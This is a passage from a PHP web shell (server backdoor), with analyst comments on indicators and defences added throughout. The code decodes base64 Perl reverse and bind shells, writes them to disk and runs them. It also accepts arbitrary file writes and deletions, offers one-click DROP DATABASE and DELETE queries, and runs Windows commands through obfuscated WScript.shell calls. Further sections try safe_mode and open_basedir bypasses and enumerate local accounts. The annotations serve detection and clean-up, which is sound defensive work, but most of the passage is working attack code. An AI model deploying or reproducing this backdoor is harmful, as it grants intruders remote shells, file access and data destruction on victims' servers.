529MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
530dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
531IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
532YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
533LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
534KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
535KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
536IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
537ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
538$opbc=fopen("bcc.pl","w");
539fwrite($opbc,base64_decode($bcperl));
540fclose($opbc);
541system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
542}
543function wbp($wb){
544$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
545cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
546a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
547ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
548IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
549IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
550VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
551VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
552$opwb=fopen("wbp.pl","w");
553fwrite($opwb,base64_decode($wbp));
554fclose($opwb);
555echo getcwd();
556system("perl wbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
557}
558function lbp($wb){
559$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
560YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
561U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
562VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
563QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
564dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
565b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
566Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
567$oplb=fopen("lbp.pl","w");
568fwrite($oplb,base64_decode($lbp));
569fclose($oplb);
570system("perl lbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
571}
572
// Dispatch to the remote-shell helpers defined above (wbp, lbp, bcn). Each
// helper base64-decodes an embedded Perl script, writes it into the current
// working directory (wbp.pl, lbp.pl and bcc.pl respectively) and runs it via
// system("perl ..."), with the request's port / address values placed on the
// command line unescaped.
// Defender notes: indicators are those three file names in web directories,
// perl child processes spawned by the web server account, and new listening
// sockets or outbound connections owned by that account. Including system in
// PHP's disable_functions, keeping web directories non-writable for the server
// account, and default-deny egress each break this path.
573if($_REQUEST['portbw']){
574wbp($_REQUEST['portbw']);
575
576}if($_REQUEST['portbl']){
577lbp($_REQUEST['portbl']);
578}
579if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
580bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
581
582}
583
584if($_REQUEST['do']=="bc"){
585echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< ����shell >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
586
587}
// Copies $file1 to "$file2<separator>$filename": the source is read fully into
// memory in 8 KiB chunks and then written to the destination, which is opened
// with mode "w" and so truncates any existing file of that name. The results
// of fopen() are not checked before use.
588function copyf($file1,$file2,$filename){
589global $slash;
590$fpc = fopen($file1, "rb");
591$source = '';
592while (!feof($fpc)) {
593$source .= fread($fpc, 8192);
594}
595fclose($fpc);
596$opt = fopen($file2.$slash.$filename, "w");
597fwrite($opt, $source);
598fclose($opt);
599}
600if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
601if(is_writable($_REQUEST['cpyto'])){
602echo $_REQUEST['address'];
603copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
604}else{alert("Permission Denied !");}}
605if($_REQUEST['cfilename']){
606
607echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
608}
609
// Arbitrary file write: the path comes from request value "nf4c" and the
// contents from "nf4cs"; the target is opened with mode "w", so an existing
// file is overwritten. Detection: POSTs carrying both parameters, and
// modification times on web content that do not match a deployment.
// File-integrity monitoring on the web root surfaces the change.
610if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
611if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
612fwrite($ofile4c,$_REQUEST['nf4cs']);
613fclose($ofile4c);
614alert("File Saved !");}else{alert("Permission Denied !");}}
615
/**
 * Analyst note: interactive database client of this web shell.
 *
 * Flow, as visible here:
 *  1. Connection details and an SQL statement are read from the request
 *     (serveR, useR, pasS, typE, dB, querY). Server, type, user and password
 *     are also copied into $_SESSION, so database credentials typed by the
 *     operator end up in PHP session storage (location depends on the session
 *     handler, which is not shown here).
 *  2. The GET parameters select_db, select_tbl, drop_db, drop_tbl and drop_row/clm
 *     are interpolated directly into SQL text. Three of these branches are
 *     destructive (DROP DATABASE, DROP TABLE, DELETE) and are triggered by a
 *     plain GET link.
 *  3. The delimiter-separated string returned by querY() is HTML-escaped, split
 *     and rendered as a table with "select" and "Drop" links.
 *  4. A connection form is printed; its built-in defaults are 'localhost',
 *     'root', '123' and 'SHOW DATABASES', and the password input is type=text.
 *
 * Detection hints taken from this code: requests to the script with do=db and the
 * mixed-case parameter names above; database audit logs showing SHOW DATABASES /
 * SHOW TABLES followed by DROP or DELETE from the web server's address.
 */
616function sqlclienT(){
617global $t,$errorbox,$et,$hcwd;
// Full connection request: remember the credentials in the session for the
// link-driven branches below.
618if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
619$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
620$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
621$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
622
623}
624
// Link-driven branches: each reuses the session credentials and builds its SQL
// from GET values without escaping or validation.
625if (isset ($_GET[select_db])){
626 $getdb=$_GET[select_db];
627 $_SESSION[db]=$getdb;
628 $query="SHOW TABLES";
629 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
630}
631elseif (isset ($_GET[select_tbl])){
632 $tbl=$_GET[select_tbl];
633 $_SESSION[tbl]=$tbl;
634 $query="SELECT * FROM `$tbl`";
635 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
636}
// Destructive: drops the named database, then lists the remaining ones.
637elseif (isset ($_GET[drop_db])){
638 $getdb=$_GET[drop_db];
639 $_SESSION[db]=$getdb;
640 $query="DROP DATABASE `$getdb`";
641 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
642 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
643}
// Destructive: drops the named table in the session's current database.
644elseif (isset ($_GET[drop_tbl])){
645 $getbl=$_GET[drop_tbl];
646 $query="DROP TABLE `$getbl`";
647 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
648 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
649}
// Destructive: deletes rows where column 'clm' equals 'drop_row'; both values come
// from the query string.
650elseif (isset ($_GET[drop_row])){
651 $getrow=$_GET[drop_row];
652 $getclm=$_GET[clm];
653 $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
654 $tbl=$_SESSION[tbl];
655 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
656 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
657}
// Default: run the free-form statement submitted through the form.
658else
659 $res=querY($type,$server,$user,$pass,$db,$query);
660
// Render the result. $title[0] holds the rows, $title[1] the field names; see
// querY() for the delimiter layout.
661if($res){
662$res=htmlspecialchars($res);
663$row=array ();
664$title=explode('[+][+][+]',$res);
665$trow=explode('[-][-][-]',$title[1]);
666$row=explode('|+|+|+|+|+|',$title[0]);
667$data=array();
// Last real field name (the final explode() element is the empty string after the
// trailing delimiter).
668$field=$trow[count($trow)-2];
// Guess what kind of listing this is from the first column header.
669if (strstr($trow[0],'Database')!='')
670 $obj='db';
671elseif (substr($trow[0],0,6)=='Tables')
672 $obj='tbl';
673else
674 $obj='row';
675$i=0;
676foreach ($row as $a){
677if($a!='')
678$data[$i++]=explode('|-|-|-|-|-|',$a);
679}
680
681echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
682foreach ($trow as $ti)
683echo "<td bgcolor='F2F2F2'>$ti</td>";
684echo "</tr>";
685$j=0;
686while ($data[$j]){
687 echo "<tr>";
688 foreach ($data[$j++] as $dr){
689 echo "<td>";
690 if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
691 echo $dr;
692 if($obj!='row') echo "</a>";
693 echo "</td>";
694 }
// One "Drop" link per row, keyed on the last cell of that row.
695 echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
696 if($obj=='row')
697 echo "&clm=$field";
698 echo "'>Drop</a></td></tr>";
699}
700echo "</table><br>";
701
702}
703
704
705
706
707
// Connection form; previously submitted values are echoed back HTML-escaped.
708if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
709echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
710if ($_REQUEST['typE']=='MySQL')echo 'selected';
711echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
712if ($_REQUEST['typE']=='MSSQL')echo 'selected';
713echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
714if ($_REQUEST['typE']=='Oracle')echo 'selected';
715echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
716if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
717echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
718if ($_REQUEST['typE']=='DB2')echo 'selected';
719echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
720if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
721echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
722if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
723echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
724if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
725echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
726if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
727echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
728if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
729echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
730}
731
732
/**
 * Analyst note: runs one SQL statement through the selected legacy database
 * driver and serialises the result into a delimiter-separated string.
 *
 * $query is sent to the server verbatim. Every branch first checks that the
 * driver's connect function exists and returns 0 when it does not; 0 is also
 * returned for an unknown $type or a failed connection.
 *
 * Result layout (consumed by sqlclienT()): the values of a row joined by
 * '|-|-|-|-|-|', each row followed by '|+|+|+|+|+|', then '[+][+][+]', then each
 * field name followed by '[-][-][-]'.
 *
 * Triage aid: the mysql_* and mssql_* functions belong to extensions removed in
 * PHP 7.0, so on such runtimes those two branches stop at function_exists().
 *
 * @param string $type  'MySQL', 'MSSQL', 'Oracle', 'PostgreSQL' or 'DB2'
 * @param string $host  server address (not used by the Oracle and DB2 branches)
 * @param string $user  database user
 * @param string $pass  database password
 * @param string $db    database name; optional for MySQL/MSSQL, used as the
 *                      connection target for Oracle and DB2
 * @param string $query SQL text to execute
 * @return string|int serialised result, or 0 as described above
 */
733function querY($type,$host,$user,$pass,$db='',$query){
734$res='';
735switch($type){
736case 'MySQL':
737if(!function_exists('mysql_connect'))return 0;
738$link=mysql_connect($host,$user,$pass);
739if($link){
740if(!empty($db))mysql_select_db($db,$link);
741$result=mysql_query($query,$link);
// Rows are only serialised when the call did not simply return true (i.e. the
// statement produced a result set).
742if ($result!=1){
743while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
744$res.='[+][+][+]';
745for($i=0;$i<mysql_num_fields($result);$i++)
746$res.=mysql_field_name($result,$i).'[-][-][-]';
747}
748mysql_close($link);
749return $res;
750}
751break;
752case 'MSSQL':
753if(!function_exists('mssql_connect'))return 0;
754$link=mssql_connect($host,$user,$pass);
755if($link){
756if(!empty($db))mssql_select_db($db,$link);
757$result=mssql_query($query,$link);
758while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
759$res.='[+][+][+]';
760for($i=0;$i<mssql_num_fields($result);$i++)
761$res.=mssql_field_name($result,$i).'[-][-][-]';
762mssql_close($link);
763return $res;
764}
765break;
766case 'Oracle':
767if(!function_exists('ocilogon'))return 0;
// $db is passed as the third ocilogon() argument; $host is unused here.
768$link=ocilogon($user,$pass,$db);
769if($link){
770$stm=ociparse($link,$query);
771ociexecute($stm,OCI_DEFAULT);
772while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
773$res.='[+][+][+]';
774for($i=0;$i<oci_num_fields($stm);$i++)
775$res.=oci_field_name($stm,$i).'[-][-][-]';
776return $res;
777}
778break;
779case 'PostgreSQL':
780if(!function_exists('pg_connect'))return 0;
// Connection string is assembled from the raw arguments.
781$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
782if($link){
783$result=pg_query($link,$query);
784while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
785$res.='[+][+][+]';
786for($i=0;$i<pg_num_fields($result);$i++)
787$res.=pg_field_name($result,$i).'[-][-][-]';
788pg_close($link);
789return $res;
790}
791break;
792case 'DB2':
793if(!function_exists('db2_connect'))return 0;
// $db is the first db2_connect() argument; $host is unused here.
794$link=db2_connect($db,$user,$pass);
795if($link){
796$result=db2_exec($link,$query);
797while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
798$res.='[+][+][+]';
799for($i=0;$i<db2_num_fields($result);$i++)
800$res.=db2_field_name($result,$i).'[-][-][-]';
801db2_close($link);
802return $res;
803}
804break;
805}
806return 0;
807}
/**
 * Analyst note: symlink-based file-read helper; the page labels the feature
 * "Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink".
 *
 * What the code does in the current working directory:
 *  - stops with die() unless the directory is writable;
 *  - creates a directory chain mirroring each non-empty component of $file;
 *  - removes and re-creates an entry named "fakesymlink" (symlink, then a
 *    directory at the end);
 *  - creates a link named "symlink" followed by a counter value.
 *
 * NOTE(review): $fakedep, $fakedir and $num are read but never assigned inside
 * this function and are not declared global, so the directory depth and names
 * cannot be determined from this part of the file.
 *
 * Artefacts to look for during clean-up: "fakesymlink", "symlink*" entries and
 * directory trees that mirror absolute paths inside web-writable folders.
 *
 * @param string $file '/'-separated path the operator wants to reach
 */
808function bywsym($file){
// Only prints a message; execution continues even when symlink() is missing.
809if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
810
811if(!is_writable("."))
812 die("not writable directory");
813$level=0;
814for($as=0;$as<$fakedep;$as++){
815 if(!file_exists($fakedir))
816 mkdir($fakedir);
817 chdir($fakedir);
818}
// Walk back up to where the loop above started.
819while(1<$as--) chdir("..");
// Mirror the target path as real directories, counting the depth in $as.
820$hardstyle = explode("/", $file);
821for($a=0;$a<count($hardstyle);$a++){
822 if(!empty($hardstyle[$a])){
823 if(!file_exists($hardstyle[$a]))
824 mkdir($hardstyle[$a]);
825 chdir($hardstyle[$a]);
826 $as++;
827}}
828$as++;
829while($as--)
830 chdir("..");
// Errors from the calls below are hidden with '@'.
831@rmdir("fakesymlink");
832@unlink("fakesymlink");
833@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
// Retries with an increasing suffix until one symlink() call succeeds.
834while(1)
835 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
836 else $num++;
837@unlink("fakesymlink");
838mkdir("fakesymlink");
839}
/**
 * Analyst note: cURL-based file-read helper; the page labels the feature
 * "Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9".
 *
 * The function creates a directory literally named "file:" in the current working
 * directory, mirrors every non-empty component of $file beneath it, returns to the
 * starting directory and then asks cURL to fetch "file:file:///" . $file. The
 * response is written straight into a <textarea> in the output.
 *
 * Artefact to look for during clean-up: a "file:" directory (with a tree that
 * mirrors an absolute path) inside a web-writable folder.
 *
 * @param string $file '/'-separated path requested by the operator
 */
840function bypcu($file){
841$level=0;
842
843if(!file_exists("file:"))
844 mkdir("file:");
845chdir("file:");
846$level++;
847
848$hardstyle = explode("/", $file);
849
850for($a=0;$a<count($hardstyle);$a++){
851 if(!empty($hardstyle[$a])){
852 if(!file_exists($hardstyle[$a]))
853 mkdir($hardstyle[$a]);
854 chdir($hardstyle[$a]);
855 $level++;
856 }
857}
858
// Undo every chdir() made above.
859while($level--) chdir("..");
860
861$ch = curl_init();
862
863curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
864
865echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
866
// No return-transfer option is set, so curl_exec() prints the body directly.
867if(FALSE==curl_exec($ch))
868 die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
869
870echo ' </textarea> </FONT>';
871
872curl_close($ch);
873}
// Dispatch: any request carrying 'bypcu' is handed to bypcu() unchanged.
874if ($_REQUEST['bypcu']){
875bypcu($_REQUEST['bypcu']);
876}
// Handler do=bypasscmd (Windows): two command-execution paths.
//  - POST 'bycw' is echoed unescaped and run through a COM object. The class name
//    and the interpreter are assembled from fragments: the pieces concatenate to
//    "WScript.shell" and "cmd.exe /c ". Splitting literals like this defeats naive
//    string matching, so static rules should evaluate constant concatenation first.
//  - POST 'byws' is passed to passthru() with a leading backslash.
// Detection: POST bodies with 'bycw'/'byws'; the web server or PHP worker process
// spawning cmd.exe as a child.
877if($_REQUEST['do']=="bypasscmd"){
878if($_POST['bycw']){
879echo $_POST['bycw'];
880$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
881 $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
882 $stdout = $exec->StdOut();
883 $stcom = $stdout->ReadAll();}
884
885echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
886}
// Handler do=bypassdir: a menu of file-read tricks aimed at safe_mode / open_basedir.
// The form labels below name the PHP releases each trick was written for (4.x up to
// 5.2.x), which is useful when judging whether a given host was ever exposed.
// Detection: POST parameters byoc, byfc, byfc9, byetc, bysyml, bypcu together with
// do=bypassdir; a file named "peji.txt" appearing next to the script.
887if($_REQUEST['do']=="bypassdir"){
// 'byoc': copies the requested path through the compress.zlib:// wrapper into
// peji.txt in the current working directory.
888if($_POST['byoc']){
889if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
890$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
891}else{$bopens="Can Not Bypass This";}
892}
// 'byfc': builds a file:// URL with an embedded NUL byte followed by a traversal
// back to this script's own path.
893if($_POST['byfc']){
894curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
895$debfc=curl_exec($ch);
896}
// 'byetc': queries posix_getpwuid() for every uid from 0 to 39999, i.e. local
// account enumeration without opening the passwd file.
897if($_POST['byetc']){
898for($bye=0;$bye<40000;$bye++){
899$sbep =$sbep. posix_getpwuid($bye);
900}}
// 'byfc9': placeholder, only prints a failure message.
901if($_POST['byfc9']){
902echo "not sucsfull";
903}
// 'bysyml': forwards the path to bywsym().
904if($_REQUEST['bysyml']){
905$file=$_REQUEST['bysyml'];
906bywsym($file);
907}
908echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 
5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
909
910
911
912
913}
/**
 * Analyst note: builds the drive-letter navigation bar of the file browser.
 *
 * Tests every letter A..Z with is_dir("<letter>:" . $slash) and appends an
 * "?address=<drive>" link for each one that exists. On hosts where no such path
 * exists nothing is appended and the (never initialised) accumulator is returned.
 *
 * @return string|null HTML fragment with one link per detected drive
 */
914function printdrive(){
915global $slash;
916foreach (range("A","Z") as $tempdrive) {
917if (is_dir($tempdrive.":".$slash)){
918$adri=$tempdrive.":".$slash;
919$drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
920}
921}
922return $drivea;
923}
// File-manager write operations. No authentication or anti-forgery check is visible
// in this part of the file; every path comes straight from the request.

// Rename: POST 'addressren' (existing path) -> 'nameren' (new path).
924if($_POST['nameren'] && $_POST['addressren']){
925if(is_writable($_REQUEST['addressren'])){
926
927rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
928}else{alert("Permission Denied !");}
929}
// Delete: triggered by a GET request (do=delete), so the action and the path appear
// in access logs. Directories go to deleteDirectory(), which is defined outside
// this part of the file; files are removed with unlink().
930if($_GET['do']=="delete"){
931
932if ($_GET['type']=="dir"){
933if(is_writable($_REQUEST['address'])){
934$dir=$_GET['address'].$_GET['filename'];
935deleteDirectory($dir);
936alert("Deleted Successful !");
937}else{alert("Permission Denied !");}
938}elseif($_GET['type']=="file"){
939if(is_writable($_GET['address'].$_GET['filename'])){
940unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
941}else{alert("Permission Denied !");}
942}
943}
// Edit/save: POST 'fedit' is entity-decoded and written over address/namefe. This is
